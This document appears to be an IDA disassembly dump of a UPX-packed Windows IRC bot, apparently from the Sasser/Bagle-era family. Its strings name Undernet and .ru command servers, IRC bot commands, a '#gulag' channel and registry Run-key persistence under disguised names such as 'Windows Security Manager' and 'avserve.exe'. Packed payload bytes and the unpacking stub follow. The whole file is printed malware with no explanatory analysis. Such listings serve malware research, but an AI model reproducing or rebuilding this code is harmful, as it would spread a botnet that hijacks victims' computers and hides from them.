aFlanders_be_eu db 'flanders.be.eu.undernet.org',0 ; DATA XREF: UPX0:31304BCC�o
aGraz_at_eu_und db 'graz.at.eu.undernet.org',0 ; DATA XREF: UPX0:31304BC8�o
aGazProm_ru db 'gaz-prom.ru',0 ; DATA XREF: UPX0:31304BC4�o
aMoscowAdvokat_ db 'moscow-advokat.ru',0 ; DATA XREF: UPX0:off_31304BC0�o
align 4
aAbcdefghijkl_0 db 'abcdefghijklmnopqrstuvwxyz',0 ; DATA XREF: sub_31301D2B+1C�o
align 4
aAbcdefghijklmn db 'ABCDEFGHIJKLMNOPQRSTUVWXYZ',0 ; DATA XREF: sub_31301D2B+C�o
align 10h
aUserS8S db 'USER %s 8 * :%s',0Dh,0Ah,0 ; DATA XREF: sub_31301E60+1C4�o
align 4
aAlready db 'already',0 ; DATA XREF: sub_31301E60+133�o
aNickS db 'NICK %s',0Dh,0Ah,0 ; DATA XREF: sub_31301E60+D9�o
; sub_31301E60+165�o
align 4
aPassS db 'PASS %s',0Dh,0Ah,0 ; DATA XREF: sub_31301E60+9C�o
align 4
aPongS db 'PONG%s',0Dh,0Ah,0 ; DATA XREF: sub_313020A2+4F�o
align 10h
aPing db 'PING',0 ; DATA XREF: sub_313020A2+C�o
; sub_31302125:loc_313021C7�o
align 4
a451 db '451',0 ; DATA XREF: sub_31302125+8E�o
aJoinS db 'JOIN %s',0Dh,0Ah,0 ; DATA XREF: sub_31302125+16�o
align 4
aQuitS db 'QUIT %s',0Dh,0Ah,0 ; DATA XREF: sub_313021F7+2C�o
align 4
aPrivmsgSS db 'PRIVMSG %s %s',0Dh,0Ah,0 ; DATA XREF: sub_3130235D+3B�o
aGulag db '#gulag',0 ; DATA XREF: UPX0:3130259D�o
align 4
a9: ; DATA XREF: UPX0:3130248A�o
unicode 0, <9>,0
a_: ; DATA XREF: UPX0:3130247F�o
unicode 0, <_>,0
a_exe db '.exe',0 ; DATA XREF: sub_3130263B+75�o
; sub_31303575+4B�o
align 4
asc_31304DDC: ; DATA XREF: sub_3130263B+49�o
; sub_31303575+56�o
unicode 0, <\>,0
aMozilla4_0Comp db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0
; DATA XREF: sub_3130263B+13�o
align 4
aJoin db 'JOIN',0 ; DATA XREF: sub_31302755+2EB�o
align 4
aQ: ; DATA XREF: sub_31302755+2C6�o
unicode 0, <q>,0
aDD9SD db '%d,%d,9%s,%d',0 ; DATA XREF: sub_31302755+2A0�o
align 10h
aI: ; DATA XREF: sub_31302755+256�o
unicode 0, <i>,0
asc_31304E34: ; DATA XREF: sub_31302755+23D�o
unicode 0, <|>,0
aE: ; DATA XREF: sub_31302755+148�o
unicode 0, <e>,0
a1D db '-1,%d',0 ; DATA XREF: sub_31302755+79�o
align 4
aFtpupd_exe db 'ftpupd.exe',0 ; DATA XREF: UPX0:31302DC1�o
align 10h
aU9 db 'u9',0 ; DATA XREF: sub_31302E37+3A�o
align 4
aU7 db 'u7',0 ; DATA XREF: sub_31302E37+2E�o
align 4
aU6 db 'u6',0 ; DATA XREF: sub_31302E37+24�o
align 4
aU9x db 'u9x',0 ; DATA XREF: sub_31302E37+B�o
asc_31304E60 db 0Dh,0Ah,0 ; DATA XREF: sub_31302F59+124�o
align 4
aUseridUnix db ' : USERID : UNIX : ',0 ; DATA XREF: sub_31302F59+104�o
aSoftwareMicros db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_31302C49+23�o
; sub_313034CE+58�o ...
align 4
aUpdateService db 'Update Service',0 ; DATA XREF: sub_31302C49+1C�o
; sub_31303575+87�o ...
align 4
aSoftwareMicr_0 db 'Software\Microsoft\Wireless',0 ; DATA XREF: sub_31303641+5A�o
; sub_31303641+94�o
aClient db 'Client',0 ; DATA XREF: sub_31303641+55�o
; sub_31303641+8E�o
align 4
aAvserve2_exe db 'avserve2.exe',0 ; DATA XREF: sub_313034CE+47�o
align 4
aAvserve_exe db 'avserve.exe',0 ; DATA XREF: sub_313034CE+40�o
aWindowsUpdateS db 'Windows Update Service',0 ; DATA XREF: sub_313034CE+39�o
align 10h
aWinupdate db 'WinUpdate',0 ; DATA XREF: sub_313034CE+32�o
align 4
aSystray db 'SysTray',0 ; DATA XREF: sub_313034CE+2B�o
aBotLoader db 'Bot Loader',0 ; DATA XREF: sub_313034CE+24�o
align 10h
aSystemRestoreS db 'System Restore Service',0 ; DATA XREF: sub_313034CE+1D�o
align 4
aSystemServiceM db 'System Service Manager',0 ; DATA XREF: sub_313034CE+16�o
align 10h
aWindowsSecurit db 'Windows Security Manager',0 ; DATA XREF: sub_313034CE+F�o
align 4
a1: ; DATA XREF: sub_31303641+50�o
unicode 0, <1>,0
dd 6 dup(0)
dword_31304F98 dd 0 ; DATA XREF: UPX0:31302447�w
; UPX0:31302586�w ...
dword_31304F9C dd 0 ; DATA XREF: UPX0:loc_313024A0�o
; sub_31302755+E9�r ...
dword_31304FA0 dd 8 dup(0) ; DATA XREF: UPX0:313024A8�o
; sub_31302755+A�o
dword_31304FC0 dd 0 ; DATA XREF: sub_31302755+266�o
dword_31304FC4 dd 0 ; DATA XREF: sub_31302BFB+D�r
; sub_31302C49+80�w
dword_31304FC8 dd 0 ; DATA XREF: sub_31302755+29A�r
; sub_31302BFB+25�o ...
dword_31304FCC dd 0 ; DATA XREF: sub_31302BFB+7�r
; sub_31302C49+75�w ...
dword_31304FD0 dd 44h ; DATA XREF: sub_31301C20+C2�r
; UPX0:31302DE1�w ...
dword_31304FD4 dd 0 ; DATA XREF: sub_31302E23+2�r
; sub_31302E37+1A�w
dword_31304FD8 dd 8 dup(0) ; DATA XREF: sub_31302F59+2E�o
dword_31304FF8 dd 0 ; DATA XREF: sub_31302C49+E0�w
; sub_31303256+55�r
dword_31304FFC dd 31300000h ; DATA XREF: sub_31301C20+6�r
; UPX0:31302DC6�w
UPX0 ends
; Section 2. (virtual address 00005000)
; Virtual size : 00003000 ( 12288.)
; Section size in file : 00003000 ( 12288.)
; Offset to raw data for section: 00005000
; Flags E0000040: Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX1 segment para public 'CODE' use32
assume cs:UPX1
;org 31305000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_31305000 dd 0 ; DATA XREF: sub_31302755+294�r
; sub_31303112+36�o ...
dword_31305004 dd 0 ; DATA XREF: sub_31302755+282�r
; sub_31303256+37�w ...
dword_31305008 dd 0 ; DATA XREF: UPX0:3130246C�r
; sub_31303641+3C�w ...
dd 3FDh dup(0)
dd 0C4h, 40h, 72695601h, 6C617574h, 65657246h, 69560100h
dd 61757472h, 6C6C416Ch, 100636Fh, 4D746547h, 6C75646Fh
dd 6C694665h, 6D614E65h, 1004165h, 7274736Ch, 69706D63h
dd 43010041h, 4679706Fh, 41656C69h, 69570100h, 6578456Eh
dd 43010063h, 74616572h, 6F6F5465h, 6C65686Ch, 53323370h
dd 7370616Eh, 746F68h, 6F725001h, 73736563h, 69463233h
dd 747372h, 72655401h, 616E696Dh, 72506574h, 7365636Fh
dd 50010073h, 65636F72h, 32337373h, 7478654Eh, 65540100h
dd 6E696D72h, 54657461h, 61657268h, 44010064h, 74656C65h
dd 6C694665h, 1004165h, 74697845h, 636F7250h, 737365h
dd 74654701h, 656C6946h, 657A6953h, 65520100h, 69466461h
dd 100656Ch, 65746E49h, 636F6C72h, 4964656Bh, 6572636Eh
dd 746E656Dh, 72430100h, 65746165h, 636F7250h, 41737365h
dd 72430100h, 65746165h, 6574754Dh, 1004178h, 7274736Ch
dd 41706D63h, 65470100h, 636F4C74h, 49656C61h, 416F666Eh
dd 736C0100h, 70637274h, 1004179h, 4C746547h, 45747361h
dd 726F7272h, 79530100h, 6D657473h, 656D6954h, 69466F54h
dd 6954656Ch, 100656Dh, 53746547h, 65747379h, 6D69546Dh
dd 43010065h, 65736F6Ch, 646E6148h, 100656Ch, 74697257h
dd 6C694665h, 43010065h, 74616572h, 6C694665h, 1004165h
dd 7274736Ch, 6E797063h, 53010041h, 75437465h, 6E657272h
dd 72694474h, 6F746365h, 417972h, 74654701h, 74737953h
dd 69446D65h, 74636572h, 4179726Fh, 78450100h, 68547469h
dd 64616572h, 65530100h, 65764574h, 100746Eh, 74696157h
dd 53726F46h, 6C676E69h, 6A624F65h, 746365h, 65724301h
dd 54657461h, 61657268h, 43010064h, 74616572h, 65764565h
dd 41746Eh, 74736C01h, 6E656C72h, 53010041h, 7065656Ch
dd 65470100h, 72754374h, 746E6572h, 636F7250h, 737365h
dd 74654701h, 636F7250h, 72646441h, 737365h, 74654701h
dd 75646F4Dh, 6148656Ch, 656C646Eh, 57010041h, 65746972h
dd 636F7250h, 4D737365h, 726F6D65h, 4F010079h, 506E6570h
dd 65636F72h, 1007373h, 54746547h, 436B6369h, 746E756Fh
dd 736C0100h, 61637274h, 4174h, 0D1h, 0
dd 67655201h, 61657243h, 654B6574h, 41784579h, 65520100h
dd 74655367h, 756C6156h, 41784565h, 65520100h, 65755167h
dd 61567972h, 4565756Ch, 1004178h, 4F676552h, 4B6E6570h
dd 78457965h, 52010041h, 65446765h, 6574656Ch, 756C6156h
dd 1004165h, 43676552h, 65736F6Ch, 79654Bh, 6F624101h
dd 79537472h, 6D657473h, 74756853h, 6E776F64h, 43010041h
dd 74707972h, 61657243h, 61486574h, 1006873h, 70797243h
dd 73614874h, 74614468h, 43010061h, 74707972h, 69726556h
dd 69537966h, 74616E67h, 41657275h, 72430100h, 44747079h
dd 72747365h, 6148796Fh, 1006873h, 70797243h, 73654474h
dd 796F7274h, 79654Bh, 79724301h, 65527470h, 7361656Ch
dd 6E6F4365h, 74786574h, 72430100h, 41747079h, 69757163h
dd 6F436572h, 7865746Eh, 1004174h, 70797243h, 706D4974h
dd 4B74726Fh, 7965h, 0DEh, 0F4h, 72747301h, 797063h, 72747301h
dd 746163h, 6F746101h, 73010069h, 646E6172h, 455F0100h
dd 72705F48h, 676F6C6Fh, 5F5F0100h, 46787843h, 656D6172h
dd 646E6148h, 72656Ch, 72747301h, 727473h, 72747301h, 726863h
dd 72747301h, 6E656Ch, 6D656D01h, 746573h, 6D656D01h, 797063h
dd 6E617201h, 0E9000064h, 28000000h, 1000001h, 646E6946h
dd 646E6957h, 41776Fh, 74654701h, 65726F46h, 756F7267h
dd 6957646Eh, 776F646Eh, 65470100h, 6E695774h, 54776F64h
dd 61657268h, 6F725064h, 73736563h, 1006449h, 72707377h
dd 66746E69h, 0F4000041h, 3C000000h, 1000001h, 65746E49h
dd 74656E72h, 43746547h, 656E6E6Fh, 64657463h, 74617453h
dd 49010065h, 7265746Eh, 4F74656Eh, 416E6570h, 6E490100h
dd 6E726574h, 65527465h, 69466461h, 100656Ch, 65746E49h
dd 74656E72h, 6E65704Fh, 416C7255h, 1000000h, 1500000h
dd 73FF0000h, 8FF00h, 0FF0039FFh, 0BFF006Fh, 34FF00h, 0FF0012FFh
dd 4FF000Ch, 16FF00h, 0FF0017FFh, 2FF0009h, 0DFF00h, 0FF0001FFh
dd 10FF0003h, 13FF00h, 0
dd 455000h, 2014C00h, 0BB372600h, 40h, 0
dd 0F00E000h, 6010B01h, 300000h, 120000h, 0
dd 2DB900h, 100000h, 400000h, 30000000h, 100031h, 20000h
dd 400h, 0
dd 400h, 0
dd 600000h, 40000h, 0
dd 200h, 10000000h, 100000h, 10000000h, 100000h, 0
dd 1000h, 2 dup(0)
dd 385800h, 8C00h, 14h dup(0)
dd 100000h, 19C00h, 6 dup(0)
dd 65742E00h, 7478h, 2FD800h, 100000h, 300000h, 40000h
dd 3 dup(0)
dd 4002000h, 61642EE0h, 6174h, 100C00h, 400000h, 100000h
dd 340000h, 3 dup(0)
dd 4000h, 5000C0h, 3A8000h, 550100h, 9E982900h, 53896620h
dd 70CB1FEh, 0A3ECCA94h, 1DA11E75h, 0FFFFE8F9h, 0C5B4FFFFh
dd 0DB1A4ECBh, 3969D7F0h, 948C1A87h, 1318C67Bh, 0BF3EB382h
dd 67E0424Bh, 378400EBh, 0FFFF60B7h, 0B3AAFFFFh, 8022D7D8h
dd 0A67A6504h, 5886FF4Bh, 6EF64585h, 0C956EEF9h, 4A32002Fh
dd 7AB7A63Bh, 0DBFFD3D8h, 63EBF8B0h, 0BE746E6Fh, 0D5361278h
dd 5DABAAAAh, 6DFFC933h, 0B966FFFBh, 758D0225h, 8AFE8B05h
dd 7993C06h, 302C0646h, 88993446h, 0FF7F4707h, 0EDE2FC5Dh
dd 0DAE80AEBh, 65622EF9h, 93712E67h, 1201C999h, 0FEFEBDFDh
dd 0FD91EDFFh, 72C10716h, 0FD42AA68h, 10FDAA66h, 0F11C14BAh
dd 0F3C91A98h, 763FF698h, 28608FBh, 90100971h, 9237CB5Fh
dd 0BB1C9659h, 6FB5ED0Dh, 375183Bh, 25CD089Bh, 83B72510h
dd 0E4D291FDh, 185447ECh, 9FF31B5Dh, 0FD9BF344h, 71D8FF63h
dd 68F319AFh, 1C1065E3h, 751A0B1Dh, 9D5EFFD9h, 0B7B5BDBDh
dd 12FF24DAh, 0DD10FF12h, 0AC4F070Ah, 0FB7FEC33h, 9D0B00CEh
dd 0E51459B2h, 12323298h, 0CA89F345h, 67332C66h, 71F67FDFh
dd 6713B36Fh, 5D1A7441h, 11348AD9h, 7DEEBAF3h, 4F19DDBh
dd 4F10989h, 652EF32Dh, 4FDB66CBh, 0F0E3F367h, 2182E576h
dd 0B264FDB6h, 6F2E56C9h, 2097C0E8h, 0B6EB169Bh, 0D83C4C9Fh
dd 8ED5E5C1h, 3BC919C9h, 0DFEC7B3Fh, 414D901h, 71CA23F6h
dd 688D6329h, 2FEE9161h, 0C3F22C8Ch, 0A7ED66F4h, 6C5D12CDh
dd 0DACDB272h, 794ECBC9h, 0FE11F256h, 5A7F64C9h, 0C096A648h
dd 294CE114h, 9CF3EBA7h, 0CB93F7C9h, 0F434FF5Dh, 0C2D07126h
dd 0FECDFFFEh, 0EF133BF9h, 0F0BA0ECh, 0EDFFC5B7h, 0FDE9ECE9h
dd 0FCE1FCB7h, 7605FC2Fh, 0FCF5CA01h, 0F2CEE9FCh, 0FFFFEBFCh
dd 0FCF7F97Fh, 0C7ABAAF5h, 59AAF934h, 662A2DB4h, 0E6ACC91Eh
dd 0C9A5B7E7h, 9DB8BD9Ch, 0CFE37D82h, 3092712Eh, 513519BFh
dd 0A951E14h, 0FFFF9172h, 712AD8C1h, 0A5D230C8h, 0E180D512h
dd 6FAA529Ah, 9A2A8D14h, 0B785B9C8h, 8B12F6FFh, 58474A9Ah
dd 9BAB9E59h, 20A319DBh, 0C0A26CECh, 0FFFB7FFFh, 0DF9EED85h
dd 0EB81E8A2h, 0C8125544h, 2E961FBDh, 0D812EB8Dh, 125A9A85h
dd 5A9A099Dh, 9A1613FFh, 192DF810h, 7F664917h, 8712FEFDh
dd 0DEDDB6A9h, 95C25A76h, 82128502h, 0CB5A9104h, 0DFD4CFF7h
dd 85DE8C1Fh, 424D53FFh, 53180972h, 0EFFFFFC8h, 0FEC990h
dd 2006217h, 4E204350h, 4F575445h, 50204B52h, 97DAC752h
dd 52474FFFh, 31204D41h, 414C302Eh, 0A024D4Eh, 6FED6957h
dd 646EFA5Fh, 8C73776Fh, 5720726Fh, 72676B03h, 0E70756Fh
dd 0F75BF61Dh, 61312E33h, 32234D27h, 32303058h, 5B063232h
dd 0A16ADFEh, 4C20544Eh, 3230204Dh, 2B00A48Bh, 7737919h
dd 0BB7D8363h, 23FF0C3Eh, 0A110400h, 0D4052014h, 1BB5BEAh
dd 4C00694Dh, 5053534Bh, 253B7F00h, 82979AFFh, 57E008h
dd 64006E24h, 0DB006F00h, 77EE6D8Bh, 743A7300h, 8C090130h
dd 12DB9839h, 233500D9h, 72E1Dh, 0D9139E4h, 2008ABDAh
dd 499270DAh, 39F5706h, 60D83200h, 23466E27h, 0FF400747h
dd 603C8DCh, 1100600h, 888A151Fh, 7FFFD8E0h, 4F0048F9h
dd 19814400h, 0E4F27A6Ah, 0AF281C49h, 10742530h, 53E15367h
dd 5C1137C8h, 0EB3075DFh, 0CB075Ch, 12F5C04h, 615C085Ah
dd 0DD772363h, 36072E4Dh, 772E3800h, 0D839B330h, 491B76h
dd 6443ECh, 0E7900F3Fh, 0A26463B0h, 0F20FDC08h, 400496DFh
dd 0DE00FF16h, 0E00DEh, 2019F16h, 6121309Bh, 19284026h
dd 0F7DC346Fh, 6C8B1103h, 70D374D9h, 214B6300h, 9C2A65DFh
dd 0EE9F256Bh, 106D9EC0h, 1B04480Eh, 6E7D1354h, 5A54BAEBh
dd 22596326h, 45CBC75Ch, 0CFF9A41Dh, 58765h, 4810030Bh
dd 4FFF10B8h, 4901A09Ah, 19286A01h, 0D0B10C39h, 2FA89B11h
dd 0FD8FFCh, 2ED94FC0h, 885D5FF5h, 0C91CEB8Ah, 3CE89F11h
dd 0CF48102Bh, 60B2F645h, 0A3F40CD1h, 8790A060h, 0A00C92BCh
dd 7F0CB10Ch, 64727h, 40880CA0h, 8F000900h, 0ECDF24F0h
dd 95000703h, 7C4F4014h, 14BD4070h, 0BF60D9h, 0F84F4307h
dd 7813911Fh, 0AB001385h, 13E9A65Bh, 39E3F810h, 0FF2F3C81h
dd 60230EFEh, 40182C18h, 0F284087Ah, 88E93EE9h, 0EE10B943h
dd 10B801FFh, 793C9B30h, 0DAD200Ch, 0AF2CF07h, 0D80F7FF9h
dd 84700118h, 92BC87C8h, 950F840Fh, 4F26000Fh, 7F02037Eh
dd 0F6C0F84h, 0C3C2556Fh, 6FA89A00h, 46042743h, 69231364h
dd 5840DB6Eh, 205058F9h, 46007250h, 0A1F9014Ah, 323B6790h
dd 15123C6Bh, 89AF0275h, 53412790h, 0FF9E1C00h, 1645395h
dd 5CCC06EBh, 5C73255Ch, 0F37FFF2Fh, 24637069h, 1CEC8166h
dd 0E4FF07h, 65446553h, 69677562h, 0F64C6976h, 656CF3FFh
dd 64416567h, 7473756Ah, 656B6F54h, 0EE73176Eh, 4CDB724Fh
dd 7075126Fh, 756C6156h, 0FF174165h, 4FDFB6C5h, 636F2870h
dd 43347324h, 61766461h, 8FF11670h, 0EF3369C1h, 72657475h
dd 95395F6Dh, 0FFC4A29Bh, 5F6C6C65h, 79617254h, 72634157h
dd 0DBB9DF65h, 521A61B7h, 56F6D65h, 140C6854h, 74726956h
dd 0ADDADD75h, 2841586Dh, 0F78454Fh, 6C6E724Eh, 35ACE817h
dd 0F8F30447h, 0D3E0034Ch, 0C4D34D34h, 507090ACh, 4D34D365h
dd 182834h, 46FF4BF4h, 634E6FEDh, 72616B2Eh, 67E6442Eh
dd 6F707361h, 6E7F6564h, 7A2EEE89h, 0B92E0D61h, 6C570967h
dd 3FE16169h, 251366F7h, 7374330Fh, 75722E6Bh, 9A26EDDAh
dd 2E6EEC86h, 75650D75h, 0B175B005h, 3B8E0BD7h, 684F7727h
dd 0BBAD0AC8h, 1F7467CEh, 1F323164h, 0FE56DBB2h, 2D736F6Ch
dd 1A65BE61h, 0A6206163h, 62BB42B6h, 731D3160h, 2DB76549h
dd 652F5D65h, 17726655h, 3DEC0985h, 0E616C66h, 0E1596733h
dd 7AC2B2B6h, 1617512Eh, 869F702Dh, 6D6FB54Bh, 0F2936DD0h
dd 0DB9E2D77h, 0A90AE785h, 62ABE22Ah, 7E662D63h, 67B7FDA1h
dd 6C6B6ACBh, 706F6E6Dh, 76835E71h, 7A797877h, 25FFE5ABh
dd 434241C9h, 47464544h, 4B4A4948h, 0A85BF84Eh, 52517C40h
dd 0A7EB5453h, 0F6EF1B5Ah, 53557E37h, 52205245h, 2A203820h
dd 0D073A20h, 742B4B0Ah, 0C76C8789h, 4349F879h, 0C9EC1341h
dd 0EE500636h, 4E4F0B53h, 0F0BB0A47h, 490BDD2Bh, 0AE353407h
dd 0E20C4F4Ah, 2F587E49h, 54495551h, 0A1564952h, 41DBD8F0h
dd 23116647h, 3B017567h, 86B666C6h, 0EC5F034Dh, 0D6E8B378h
dd 4D812BF8h, 1D987A6Fh, 70BB342Fh, 20A55DBBh, 706DE528h
dd 7C6269E0h, 0D040203Bh, 497D0B90h, 0BB362045h, 0C5F3203Bh
dd 3590D42Eh, 7700298Dh, 0E7DD713Fh, 6425775Ah, 6739022Ch
dd 3691306h, 0F67D2D7Ch, 312D6033h, 70746614h, 0AF1A6402h
dd 75759EE9h, 36370339h, 0FBC2AC0Bh, 8B0F0B0h, 44491620h
dd 46FF0408h, 658DC37h, 51464FF7h, 5C455241h, 0F063694Dh
dd 860BB6C1h, 5C436F73h, 75435C87h, 346F4F72h, 746E2FBCh
dd 4669D156h, 3C75525Ch, 6DB6BA55h, 2017606Ah, 30761453h
dd 61315367h, 6B31E1ADh, 1B723F27h, 56E9635Ch, 3FBC4395h
dd 0C5737677h, 2E76CD92h, 0F993265h, 0C8DCCD0Eh, 1757F486h
dd 69F4B412h, 7379D117h, 8B420098h, 0CC5BA520h, 3D61E7B1h
dd 206D1B13h, 0D606CDA0h, 8F460668h, 14685717h, 915D0F82h
dd 6F652F91h
dd 1867B0DBh, 7469D663h, 54411979h, 2400B512h, 18322A0Ah
dd 515350E9h, 7EC9C4C9h, 13F9C56h, 65724664h, 0FFC50C65h
dd 0D7115EDh, 4D746547h, 6C75646Fh, 0BFF74665h, 4EE36F15h
dd 1E06D61h, 7274736Ch, 69706D63h, 0DC0B7B0Ah, 706F437Bh
dd 0ED0A1979h, 32657845h, 8563E2B7h, 6F6F54C6h, 3370DF6Ch
dd 0FFB5026Dh, 616E5332h, 6F687370h, 12141974h, 6EEA056Bh
dd 0F737232h, 2C350754h, 982C07B0h, 654E2118h, 0E2152078h
dd 10E3409h, 0EC97E544h, 710DAC16h, 3974696Eh, 0BAE7B7A8h
dd 6953163Fh, 2C52C37Ah, 6E49090Dh, 40AEEDB5h, 656BC96Ch
dd 44630A64h, 0AD66C9B0h, 75A210C0h, 0CBB10F41h, 984DE816h
dd 5441DF78h, 0B79761E4h, 6C613B4Ch, 196F6665h, 51187970h
dd 0D611B7Eh, 6F727245h, 0EC590172h, 6954F73Dh, 977F66Dh
dd 0B8AD1823h, 0FF646E15h, 7BAE4865h, 977F66C3h, 0C7697257h
dd 27610B7Ch, 6E2EEB45h, 0E3E530Ah, 0B11AF644h, 7363DD11h
dd 0E105478h, 9144B03h, 0BDB2DB22h, 764536DDh, 466163E5h
dd 0EE615320h, 5B9340ADh, 2E6A624Fh, 0D9B1606Dh, 2F0D2CB0h
dd 8B762C7Ch, 67B29B5h, 826C7065h, 0C212FF78h, 64410B67h
dd 0B00F7264h, 20CB6760h, 2FDA41D9h, 6D735125h, 13A1A74Dh
dd 0A146D12h, 911132B1h, 1B26753Bh, 0F1A5EC5Bh, 0D1964184h
dd 1E13F3B9h, 4B9167BEh, 10457965h, 0C89D876Bh, 510F60D6h
dd 0D808580Ah, 6311584Bh, 8B30EF30h, 10212ACDh, 8385517Fh
dd 410C6ED0h, 53459462h, 6F66F468h, 0F3A414AFh, 74707972h
dd 0AC17DB77h, 10B0CBD1h, 6112440Ah, 662BB858h, 6669990Eh
dd 76675279h, 95EB586Dh, 6C362B75h, 77796FC5h, 2CF616F6h
dd 52106F11h, 0D68F678Fh, 0F5651E36h, 4114DBF4h, 0F90D871Ah
dd 69757163h, 7C494D72h, 0E7059A71h, 0DE133AA0h, 3B9BBAF4h
dd 6107179Bh, 696F033Eh, 835B720Dh, 67519BEh, 5F48455Fh
dd 1367E0D1h, 0B77A54Ch, 7878435Fh, 3691AACAh, 72B1733Bh
dd 683B0233h, 6C581707h, 226ECADBh, 774906Dh, 0B3661A5Bh
dd 0E9724CBDh, 0C7920128h, 0ED1588Ch, 624B77C3h, 65404CC3h
dd 6E1415DCh, 0ACC6610h, 9149E14Fh, 0DADECEF4h, 198F7377h
dd 0BE416674h, 0CE8E4F3Ch, 848BE899h, 8E6EF035h, 4B866587h
dd 6E745394h, 42C1C31Ah, 0E41B2D2h, 104020C7h, 0BD55B6A3h
dd 2CB2C641h, 7317F6CBh, 6F390802h, 2CB2CB0Bh, 0C1234CBh
dd 2C171604h, 92CB2CBh, 3010D02h, 0B2D523F9h, 50BF1310h
dd 4C000045h, 10FF9601h, 40BB3778h, 0F00E02Dh, 6010B01h
dd 3CD26E30h, 2DB91269h, 0C9661810h, 0B31B1AAh, 0EC070C02h
dd 0CE92DCCh, 10341E60h, 0E04BCB07h, 58D9060Dh, 0BB618C38h
dd 9C642101h, 0B60D1E01h, 6C2E5C7Bh, 902FD807h, 82107C30h
dd 461C481h, 0D8642EE0h, 0F87B6437h, 34070CFBh, 0A1405B27h
dd 48C0165Bh, 3ADCh, 55910DC0h, 1200000h, 0FF0000h, 2 dup(0)
; ---------------------------------------------------------------------------
public start
start:
pusha
mov esi, offset dword_31305000
lea edi, [esi-4000h]
push edi
or ebp, 0FFFFFFFFh
jmp short loc_313071A2
; ---------------------------------------------------------------------------
align 8
loc_31307198: ; CODE XREF: UPX1:loc_313071A9�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
loc_3130719E: ; CODE XREF: UPX1:31307236�j
; UPX1:3130724D�j
add ebx, ebx
jnz short loc_313071A9
loc_313071A2: ; CODE XREF: UPX1:31307190�j
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_313071A9: ; CODE XREF: UPX1:313071A0�j
jb short loc_31307198
mov eax, 1
loc_313071B0: ; CODE XREF: UPX1:313071BF�j
; UPX1:313071CA�j
add ebx, ebx
jnz short loc_313071BB
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_313071BB: ; CODE XREF: UPX1:313071B2�j
adc eax, eax
add ebx, ebx
jnb short loc_313071B0
jnz short loc_313071CC
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_313071B0
loc_313071CC: ; CODE XREF: UPX1:313071C1�j
xor ecx, ecx
sub eax, 3
jb short loc_313071E0
shl eax, 8
mov al, [esi]
inc esi
xor eax, 0FFFFFFFFh
jz short loc_31307252
mov ebp, eax
loc_313071E0: ; CODE XREF: UPX1:313071D1�j
add ebx, ebx
jnz short loc_313071EB
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_313071EB: ; CODE XREF: UPX1:313071E2�j
adc ecx, ecx
add ebx, ebx
jnz short loc_313071F8
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_313071F8: ; CODE XREF: UPX1:313071EF�j
adc ecx, ecx
jnz short loc_3130721C
inc ecx
loc_313071FD: ; CODE XREF: UPX1:3130720C�j
; UPX1:31307217�j
add ebx, ebx
jnz short loc_31307208
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31307208: ; CODE XREF: UPX1:313071FF�j
adc ecx, ecx
add ebx, ebx
jnb short loc_313071FD
jnz short loc_31307219
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_313071FD
loc_31307219: ; CODE XREF: UPX1:3130720E�j
add ecx, 2
loc_3130721C: ; CODE XREF: UPX1:313071FA�j
cmp ebp, 0FFFFF300h
adc ecx, 1
lea edx, [edi+ebp]
cmp ebp, 0FFFFFFFCh
jbe short loc_3130723C
loc_3130722D: ; CODE XREF: UPX1:31307234�j
mov al, [edx]
inc edx
mov [edi], al
inc edi
dec ecx
jnz short loc_3130722D
jmp loc_3130719E
; ---------------------------------------------------------------------------
align 4
loc_3130723C: ; CODE XREF: UPX1:3130722B�j
; UPX1:31307249�j
mov eax, [edx]
add edx, 4
mov [edi], eax
add edi, 4
sub ecx, 4
ja short loc_3130723C
add edi, ecx
jmp loc_3130719E
; ---------------------------------------------------------------------------
loc_31307252: ; CODE XREF: UPX1:313071DC�j
pop esi
mov edi, esi
mov ecx, 0B2h
loc_3130725A: ; CODE XREF: UPX1:31307261�j
; UPX1:31307266�j
mov al, [edi]
inc edi
sub al, 0E8h
loc_3130725F: ; CODE XREF: UPX1:31307284�j
cmp al, 1
ja short loc_3130725A
cmp byte ptr [edi], 1
jnz short loc_3130725A
mov eax, [edi]
mov bl, [edi+4]
shr ax, 8
rol eax, 10h
xchg al, ah
sub eax, edi
sub bl, 0E8h
add eax, esi
mov [edi], eax
add edi, 5
mov eax, ebx
loop loc_3130725F
lea edi, [esi+5000h]
loc_3130728C: ; CODE XREF: UPX1:313072AE�j
mov eax, [edi]
or eax, eax
jz short loc_313072D7
mov ebx, [edi+4]
lea eax, [eax+esi+7000h]
add ebx, esi
push eax
add edi, 8
call dword ptr [esi+708Ch]
xchg eax, ebp
loc_313072A9: ; CODE XREF: UPX1:313072CF�j
mov al, [edi]
inc edi
or al, al
jz short loc_3130728C
mov ecx, edi
jns short near ptr loc_313072BA+1
movzx eax, word ptr [edi]
inc edi
push eax
inc edi
loc_313072BA: ; CODE XREF: UPX1:313072B2�j
mov ecx, 0AEF24857h
push ebp
call dword ptr [esi+7090h]
or eax, eax
jz short loc_313072D1
mov [ebx], eax
add ebx, 4
jmp short loc_313072A9
; ---------------------------------------------------------------------------
loc_313072D1: ; CODE XREF: UPX1:313072C8�j
call dword ptr [esi+7094h]
loc_313072D7: ; CODE XREF: UPX1:31307290�j
popa
jmp loc_31302DB9
; ---------------------------------------------------------------------------
align 1000h
UPX1 ends
; Section 3. (virtual address 00008000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00001000 ( 4096.)
; Offset to raw data for section: 00008000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
UPX2 segment para public 'DATA' use32
assume cs:UPX2
;org 31308000h
dd 3 dup(0)
